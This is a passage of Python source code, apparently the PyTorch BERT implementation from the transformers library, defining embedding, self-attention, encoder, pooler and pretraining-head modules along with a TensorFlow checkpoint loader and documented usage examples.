"bert-base-multilingual-uncased",
"bert-base-multilingual-cased",
"bert-base-chinese",
"bert-base-german-cased",
"bert-large-uncased-whole-word-masking",
"bert-large-cased-whole-word-masking",
"bert-large-uncased-whole-word-masking-finetuned-squad",
"bert-large-cased-whole-word-masking-finetuned-squad",
"bert-base-cased-finetuned-mrpc",
"bert-base-german-dbmdz-cased",
"bert-base-german-dbmdz-uncased",
"cl-tohoku/bert-base-japanese",
"cl-tohoku/bert-base-japanese-whole-word-masking",
"cl-tohoku/bert-base-japanese-char",
"cl-tohoku/bert-base-japanese-char-whole-word-masking",
"TurkuNLP/bert-base-finnish-cased-v1",
"TurkuNLP/bert-base-finnish-uncased-v1",
"wietsedv/bert-base-dutch-cased",
# See all BERT models at https://huggingface.co/models?filter=bert
]
def load_tf_weights_in_bert(model, config, tf_checkpoint_path):
""" Load tf checkpoints in a pytorch model.
"""
try:
import re
import numpy as np
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(tf_checkpoint_path)
logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
logger.info("Loading TF weight {} with shape {}".format(name, shape))
array = tf.train.load_variable(tf_path, name)
names.append(name)
arrays.append(array)
for name, array in zip(names, arrays):
name = name.split("/")
# adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculated m and v
# which are not required for using pretrained model
if any(
n in ["adam_v", "adam_m", "AdamWeightDecayOptimizer", "AdamWeightDecayOptimizer_1", "global_step"]
for n in name
):
logger.info("Skipping {}".format("/".join(name)))
continue
pointer = model
for m_name in name:
if re.fullmatch(r"[A-Za-z]+_\d+", m_name):
scope_names = re.split(r"_(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "kernel" or scope_names[0] == "gamma":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "output_bias" or scope_names[0] == "beta":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "output_weights":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "squad":
pointer = getattr(pointer, "classifier")
else:
try:
pointer = getattr(pointer, scope_names[0])
except AttributeError:
logger.info("Skipping {}".format("/".join(name)))
continue
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
if m_name[-11:] == "_embeddings":
pointer = getattr(pointer, "weight")
elif m_name == "kernel":
array = np.transpose(array)
try:
assert pointer.shape == array.shape
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
logger.info("Initialize PyTorch weight {}".format(name))
pointer.data = torch.from_numpy(array)
return model
def mish(x):
return x * torch.tanh(nn.functional.softplus(x))
ACT2FN = {"gelu": gelu, "relu": torch.nn.functional.relu, "swish": swish, "gelu_new": gelu_new, "mish": mish}
BertLayerNorm = torch.nn.LayerNorm
class BertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings.
"""
def __init__(self, config):
super().__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
# self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
# any TensorFlow checkpoint file
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
device = input_ids.device if input_ids is not None else inputs_embeds.device
if position_ids is None:
position_ids = torch.arange(seq_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).expand(input_shape)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = inputs_embeds + position_embeddings + token_type_embeddings
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class BertSelfAttention(nn.Module):
def __init__(self, config):
super().__init__()
if config.hidden_size % config.num_attention_heads != 0 and not hasattr(config, "embedding_size"):
raise ValueError(
"The hidden size (%d) is not a multiple of the number of attention "
"heads (%d)" % (config.hidden_size, config.num_attention_heads)
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.query = nn.Linear(config.hidden_size, self.all_head_size)
self.key = nn.Linear(config.hidden_size, self.all_head_size)
self.value = nn.Linear(config.hidden_size, self.all_head_size)
self.dropout = nn.Dropout(config.attention_probs_dropout_prob)
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
mixed_query_layer = self.query(hidden_states)
# If this is instantiated as a cross-attention module, the keys
# and values come from an encoder; the attention mask needs to be
# such that the encoder's padding tokens are not attended to.
if encoder_hidden_states is not None:
mixed_key_layer = self.key(encoder_hidden_states)
mixed_value_layer = self.value(encoder_hidden_states)
attention_mask = encoder_attention_mask
else:
mixed_key_layer = self.key(hidden_states)
mixed_value_layer = self.value(hidden_states)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in BertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
class BertSelfOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class BertAttention(nn.Module):
def __init__(self, config):
super().__init__()
self.self = BertSelfAttention(config)
self.output = BertSelfOutput(config)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(
heads, self.self.num_attention_heads, self.self.attention_head_size, self.pruned_heads
)
# Prune linear layers
self.self.query = prune_linear_layer(self.self.query, index)
self.self.key = prune_linear_layer(self.self.key, index)
self.self.value = prune_linear_layer(self.self.value, index)
self.output.dense = prune_linear_layer(self.output.dense, index, dim=1)
# Update hyper params and store pruned heads
self.self.num_attention_heads = self.self.num_attention_heads - len(heads)
self.self.all_head_size = self.self.attention_head_size * self.self.num_attention_heads
self.pruned_heads = self.pruned_heads.union(heads)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
self_outputs = self.self(
hidden_states, attention_mask, head_mask, encoder_hidden_states, encoder_attention_mask, output_attentions,
)
attention_output = self.output(self_outputs[0], hidden_states)
outputs = (attention_output,) + self_outputs[1:] # add attentions if we output them
return outputs
class BertIntermediate(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.intermediate_size)
if isinstance(config.hidden_act, str):
self.intermediate_act_fn = ACT2FN[config.hidden_act]
else:
self.intermediate_act_fn = config.hidden_act
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.intermediate_act_fn(hidden_states)
return hidden_states
class BertOutput(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = self.LayerNorm(hidden_states + input_tensor)
return hidden_states
class BertLayer(nn.Module):
def __init__(self, config):
super().__init__()
self.attention = BertAttention(config)
self.is_decoder = config.is_decoder
if self.is_decoder:
self.crossattention = BertAttention(config)
self.intermediate = BertIntermediate(config)
self.output = BertOutput(config)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
self_attention_outputs = self.attention(
hidden_states, attention_mask, head_mask, output_attentions=output_attentions,
)
attention_output = self_attention_outputs[0]
outputs = self_attention_outputs[1:] # add self attentions if we output attention weights
if self.is_decoder and encoder_hidden_states is not None:
cross_attention_outputs = self.crossattention(
attention_output,
attention_mask,
head_mask,
encoder_hidden_states,
encoder_attention_mask,
output_attentions,
)
attention_output = cross_attention_outputs[0]
outputs = outputs + cross_attention_outputs[1:] # add cross attentions if we output attention weights
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
outputs = (layer_output,) + outputs
return outputs
class BertEncoder(nn.Module):
def __init__(self, config):
super().__init__()
self.config = config
self.layer = nn.ModuleList([BertLayer(config) for _ in range(config.num_hidden_layers)])
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
output_hidden_states=False,
):
all_hidden_states = ()
all_attentions = ()
for i, layer_module in enumerate(self.layer):
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if getattr(self.config, "gradient_checkpointing", False):
def create_custom_forward(module):
def custom_forward(*inputs):
return module(*inputs, output_attentions)
return custom_forward
layer_outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(layer_module),
hidden_states,
attention_mask,
head_mask[i],
encoder_hidden_states,
encoder_attention_mask,
)
else:
layer_outputs = layer_module(
hidden_states,
attention_mask,
head_mask[i],
encoder_hidden_states,
encoder_attention_mask,
output_attentions,
)
hidden_states = layer_outputs[0]
if output_attentions:
all_attentions = all_attentions + (layer_outputs[1],)
# Add last layer
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
outputs = (hidden_states,)
if output_hidden_states:
outputs = outputs + (all_hidden_states,)
if output_attentions:
outputs = outputs + (all_attentions,)
return outputs # last-layer hidden state, (all hidden states), (all attentions)
class BertPooler(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
def forward(self, hidden_states):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
class BertPredictionHeadTransform(nn.Module):
def __init__(self, config):
super().__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
if isinstance(config.hidden_act, str):
self.transform_act_fn = ACT2FN[config.hidden_act]
else:
self.transform_act_fn = config.hidden_act
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=config.layer_norm_eps)
def forward(self, hidden_states):
hidden_states = self.dense(hidden_states)
hidden_states = self.transform_act_fn(hidden_states)
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
class BertLMPredictionHead(nn.Module):
def __init__(self, config):
super().__init__()
self.transform = BertPredictionHeadTransform(config)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
self.bias = nn.Parameter(torch.zeros(config.vocab_size))
# Need a link between the two variables so that the bias is correctly resized with `resize_token_embeddings`
self.decoder.bias = self.bias
def forward(self, hidden_states):
hidden_states = self.transform(hidden_states)
hidden_states = self.decoder(hidden_states)
return hidden_states
class BertOnlyMLMHead(nn.Module):
def __init__(self, config):
super().__init__()
self.predictions = BertLMPredictionHead(config)
def forward(self, sequence_output):
prediction_scores = self.predictions(sequence_output)
return prediction_scores
class BertOnlyNSPHead(nn.Module):
def __init__(self, config):
super().__init__()
self.seq_relationship = nn.Linear(config.hidden_size, 2)
def forward(self, pooled_output):
seq_relationship_score = self.seq_relationship(pooled_output)
return seq_relationship_score
class BertPreTrainingHeads(nn.Module):
def __init__(self, config):
super().__init__()
self.predictions = BertLMPredictionHead(config)
self.seq_relationship = nn.Linear(config.hidden_size, 2)
def forward(self, sequence_output, pooled_output):
prediction_scores = self.predictions(sequence_output)
seq_relationship_score = self.seq_relationship(pooled_output)
return prediction_scores, seq_relationship_score
class BertPreTrainedModel(PreTrainedModel):
""" An abstract class to handle weights initialization and
a simple interface for downloading and loading pretrained models.
"""
config_class = BertConfig
load_tf_weights = load_tf_weights_in_bert
base_model_prefix = "bert"
def _init_weights(self, module):
""" Initialize the weights """
if isinstance(module, (nn.Linear, nn.Embedding)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
elif isinstance(module, BertLayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
if isinstance(module, nn.Linear) and module.bias is not None:
module.bias.data.zero_()
BERT_START_DOCSTRING = r"""
This model is a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`_ sub-class.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general
usage and behavior.
Parameters:
config (:class:`~transformers.BertConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the configuration.
Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model weights.
"""
BERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`{0}`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using :class:`transformers.BertTokenizer`.
See :func:`transformers.PreTrainedTokenizer.encode` and
:func:`transformers.PreTrainedTokenizer.encode_plus` for details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`torch.FloatTensor` of shape :obj:`{0}`, `optional`, defaults to :obj:`None`):
Mask to avoid performing attention on padding token indices.
Mask values selected in ``[0, 1]``:
``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.
`What are attention masks? <../glossary.html#attention-mask>`__
token_type_ids (:obj:`torch.LongTensor` of shape :obj:`{0}`, `optional`, defaults to :obj:`None`):
Segment token indices to indicate first and second portions of the inputs.
Indices are selected in ``[0, 1]``: ``0`` corresponds to a `sentence A` token, ``1``
corresponds to a `sentence B` token
`What are token type IDs? <../glossary.html#token-type-ids>`_
position_ids (:obj:`torch.LongTensor` of shape :obj:`{0}`, `optional`, defaults to :obj:`None`):
Indices of positions of each input sequence tokens in the position embeddings.
Selected in the range ``[0, config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`, defaults to :obj:`None`):
Mask to nullify selected heads of the self-attention modules.
Mask values selected in ``[0, 1]``:
:obj:`1` indicates the head is **not masked**, :obj:`0` indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`, defaults to :obj:`None`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert `input_ids` indices into associated vectors
than the model's internal embedding lookup matrix.
encoder_hidden_states (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`, defaults to :obj:`None`):
Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
if the model is configured as a decoder.
encoder_attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Mask to avoid performing attention on the padding token indices of the encoder input. This mask
is used in the cross-attention if the model is configured as a decoder.
Mask values selected in ``[0, 1]``:
``1`` for tokens that are NOT MASKED, ``0`` for MASKED tokens.
output_attentions (:obj:`bool`, `optional`, defaults to :obj:`None`):
If set to ``True``, the attentions tensors of all attention layers are returned. See ``attentions`` under returned tensors for more detail.
"""
@add_start_docstrings(
"The bare Bert Model transformer outputting raw hidden-states without any specific head on top.",
BERT_START_DOCSTRING,
)
class BertModel(BertPreTrainedModel):
"""
The model can behave as an encoder (with only self-attention) as well
as a decoder, in which case a layer of cross-attention is added between
the self-attention layers, following the architecture described in `Attention is all you need`_ by Ashish Vaswani,
Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser and Illia Polosukhin.
To behave as an decoder the model needs to be initialized with the
:obj:`is_decoder` argument of the configuration set to :obj:`True`; an
:obj:`encoder_hidden_states` is expected as an input to the forward pass.
.. _`Attention is all you need`:
https://arxiv.org/abs/1706.03762
"""
def __init__(self, config):
super().__init__(config)
self.config = config
self.embeddings = BertEmbeddings(config)
self.encoder = BertEncoder(config)
self.pooler = BertPooler(config)
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def _prune_heads(self, heads_to_prune):
""" Prunes heads of the model.
heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
See base class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=None,
output_hidden_states=None,
):
r"""
Return:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
last_hidden_state (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`):
Sequence of hidden-states at the output of the last layer of the model.
pooler_output (:obj:`torch.FloatTensor`: of shape :obj:`(batch_size, hidden_size)`):
Last layer hidden-state of the first token of the sequence (classification token)
further processed by a Linear layer and a Tanh activation function. The Linear
layer weights are trained from the next sentence prediction (classification)
objective during pre-training.
This output is usually *not* a good summary
of the semantic content of the input, you're often better with averaging or pooling
the sequence of hidden-states for the whole input sequence.
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertModel, BertTokenizer
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertModel.from_pretrained('bert-base-uncased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
outputs = model(input_ids)
last_hidden_states = outputs[0] # The last hidden-state is the first element of the output tuple
"""
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if attention_mask is None:
attention_mask = torch.ones(input_shape, device=device)
if token_type_ids is None:
token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=device)
# We can provide a self-attention mask of dimensions [batch_size, from_seq_length, to_seq_length]
# ourselves in which case we just need to make it broadcastable to all heads.
extended_attention_mask: torch.Tensor = self.get_extended_attention_mask(attention_mask, input_shape, device)
# If a 2D ou 3D attention mask is provided for the cross-attention
# we need to make broadcastabe to [batch_size, num_heads, seq_length, seq_length]
if self.config.is_decoder and encoder_hidden_states is not None:
encoder_batch_size, encoder_sequence_length, _ = encoder_hidden_states.size()
encoder_hidden_shape = (encoder_batch_size, encoder_sequence_length)
if encoder_attention_mask is None:
encoder_attention_mask = torch.ones(encoder_hidden_shape, device=device)
encoder_extended_attention_mask = self.invert_attention_mask(encoder_attention_mask)
else:
encoder_extended_attention_mask = None
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)
embedding_output = self.embeddings(
input_ids=input_ids, position_ids=position_ids, token_type_ids=token_type_ids, inputs_embeds=inputs_embeds
)
encoder_outputs = self.encoder(
embedding_output,
attention_mask=extended_attention_mask,
head_mask=head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_extended_attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(sequence_output)
outputs = (sequence_output, pooled_output,) + encoder_outputs[
1:
] # add hidden_states and attentions if they are here
return outputs # sequence_output, pooled_output, (hidden_states), (attentions)
@add_start_docstrings(
"""Bert Model with two heads on top as done during the pre-training: a `masked language modeling` head and
a `next sentence prediction (classification)` head. """,
BERT_START_DOCSTRING,
)
class BertForPreTraining(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.bert = BertModel(config)
self.cls = BertPreTrainingHeads(config)
self.init_weights()
def get_output_embeddings(self):
return self.cls.predictions.decoder
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
next_sentence_label=None,
output_attentions=None,
output_hidden_states=None,
**kwargs
):
r"""
labels (``torch.LongTensor`` of shape ``(batch_size, sequence_length)``, `optional`, defaults to :obj:`None`):
Labels for computing the masked language modeling loss.
Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring)
Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels
in ``[0, ..., config.vocab_size]``
next_sentence_label (``torch.LongTensor`` of shape ``(batch_size,)``, `optional`, defaults to :obj:`None`):
Labels for computing the next sequence prediction (classification) loss. Input should be a sequence pair (see :obj:`input_ids` docstring)
Indices should be in ``[0, 1]``.
``0`` indicates sequence B is a continuation of sequence A,
``1`` indicates sequence B is a random sequence.
kwargs (:obj:`Dict[str, any]`, optional, defaults to `{}`):
Used to hide legacy arguments that have been deprecated.
Returns:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
loss (`optional`, returned when ``labels`` is provided) ``torch.FloatTensor`` of shape ``(1,)``:
Total loss as the sum of the masked language modeling loss and the next sequence prediction (classification) loss.
prediction_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`)
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
seq_relationship_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, 2)`):
Prediction scores of the next sequence prediction (classification) head (scores of True/False
continuation before SoftMax).
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertTokenizer, BertForPreTraining
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertForPreTraining.from_pretrained('bert-base-uncased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
outputs = model(input_ids)
prediction_scores, seq_relationship_scores = outputs[:2]
"""
if "masked_lm_labels" in kwargs:
warnings.warn(
"The `masked_lm_labels` argument is deprecated and will be removed in a future version, use `labels` instead.",
DeprecationWarning,
)
labels = kwargs.pop("masked_lm_labels")
assert kwargs == {}, f"Unexpected keyword arguments: {list(kwargs.keys())}."
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
)
sequence_output, pooled_output = outputs[:2]
prediction_scores, seq_relationship_score = self.cls(sequence_output, pooled_output)
outputs = (prediction_scores, seq_relationship_score,) + outputs[
2:
] # add hidden states and attention if they are here
if labels is not None and next_sentence_label is not None:
loss_fct = CrossEntropyLoss()
masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), labels.view(-1))
next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
total_loss = masked_lm_loss + next_sentence_loss
outputs = (total_loss,) + outputs
return outputs # (loss), prediction_scores, seq_relationship_score, (hidden_states), (attentions)
@add_start_docstrings(
"""Bert Model with a `language modeling` head on top for CLM fine-tuning. """, BERT_START_DOCSTRING
)
class BertLMHeadModel(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
assert config.is_decoder, "If you want to use `BertLMHeadModel` as a standalone, add `is_decoder=True`."
self.bert = BertModel(config)
self.cls = BertOnlyMLMHead(config)
self.init_weights()
def get_output_embeddings(self):
return self.cls.predictions.decoder
@add_start_docstrings_to_callable(BERT_INPUTS_DOCSTRING.format("(batch_size, sequence_length)"))
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=None,
output_hidden_states=None,
**kwargs
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`, defaults to :obj:`None`):
Labels for computing the left-to-right language modeling loss (next word prediction).
Indices should be in ``[-100, 0, ..., config.vocab_size]`` (see ``input_ids`` docstring)
Tokens with indices set to ``-100`` are ignored (masked), the loss is only computed for the tokens with labels
in ``[0, ..., config.vocab_size]``
kwargs (:obj:`Dict[str, any]`, optional, defaults to `{}`):
Used to hide legacy arguments that have been deprecated.
Returns:
:obj:`tuple(torch.FloatTensor)` comprising various elements depending on the configuration (:class:`~transformers.BertConfig`) and inputs:
ltr_lm_loss (:obj:`torch.FloatTensor` of shape :obj:`(1,)`, `optional`, returned when :obj:`labels` is provided):
Next token prediction loss.
prediction_scores (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`)
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
hidden_states (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`torch.FloatTensor` (one for the output of the embeddings + one for the output of each layer)
of shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(torch.FloatTensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`torch.FloatTensor` (one for each layer) of shape
:obj:`(batch_size, num_heads, sequence_length, sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
Examples::
from transformers import BertTokenizer, BertLMHeadModel
import torch
tokenizer = BertTokenizer.from_pretrained('bert-base-uncased')
model = BertLMHeadModel.from_pretrained('bert-base-uncased', is_decoder=True)
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True)).unsqueeze(0) # Batch size 1
outputs = model(input_ids, labels=input_ids)
loss, prediction_scores = outputs[:2]
"""
outputs = self.bert(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
